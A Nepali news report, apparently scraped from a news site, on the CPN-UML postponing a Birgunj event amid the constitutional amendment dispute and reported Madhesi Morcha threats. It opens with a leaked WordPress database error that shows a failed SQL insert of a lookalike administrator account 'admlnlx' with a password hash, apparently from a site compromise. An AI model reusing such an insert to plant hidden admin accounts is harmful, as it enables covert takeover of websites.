WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/x0CYpdw6n9MG5yNInlZLN8m9IRJT0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-22 11:26:04', '', 'admlnlx', 'admlnlx')
वीरगञ्ज,मंसिर २३-
वीरगञ्जमा शुक्रबार एमालेका केन्द्रीय नेताको सहभागीतामा हुने भनिएको कार्यक्रम स्थगित गरिएको छ । एमाले महासचिव ईश्वर पोखरेल, प्रचार विभाग प्रमुख एवम् सचिव योगेश भटटराईलगायत केन्द्रीय नेताले सम्बोधन गर्ने तय भएको कार्यक्रम स्थगित भएको हो ।
एमालेले वीरगञ्जको नगर सभागृहमा शुक्रबार र शनिबार दुई दिन ‘नवयुग’ पत्रिकाको राष्ट्रिय भेला गर्ने तयारी गरेको थियो । व्यवस्थापिका संसदमा संविधान संशोधन प्रस्ताव दर्ता भएपछि राष्ट्रिय राजनीति जटिल बन्दै गएपछि एमालेले वीरगञ्जको कार्यक्रम स्थगित गरेको हो ।
पार्टीको नेतृत्व सडक र सदन संघर्षमा केन्द्रित भएकाले वीरगञ्जको कार्यक्रम स्थगित गरिएको एमालेको प्रचार विभागका सदस्य अरविन्द सिंहले जानकारी दिए।
यद्यपी एमालेले राष्ट्रिय राजनीतिक परिस्थिति जटिल भएका कारण मात्र नभएर वीरगञ्जको कार्यक्रम मधेसी मोर्चाको धम्कीका कारण स्थगित भएको स्रोतको दाबी छ ।
मंसिर १८ गते वीरगञ्जमा बसेको मधेसी मोर्चाको बैठकले मधेसीको माग पूरा गर्न एमाले बाधक बनेको ठहर गर्दै पर्सामा एमालेलाई कुनै पनि राजनीतिक गतिविधी गर्न नदिने र गरेको खण्डमा प्रतिवाद गर्ने चेतावनी दिएको थियो । मोर्चाको धम्कीकै कारण एमालेले वीरगञ्जमा गर्न लागको कार्यक्रम स्थगित गरेको स्रोतको दाबी छ ।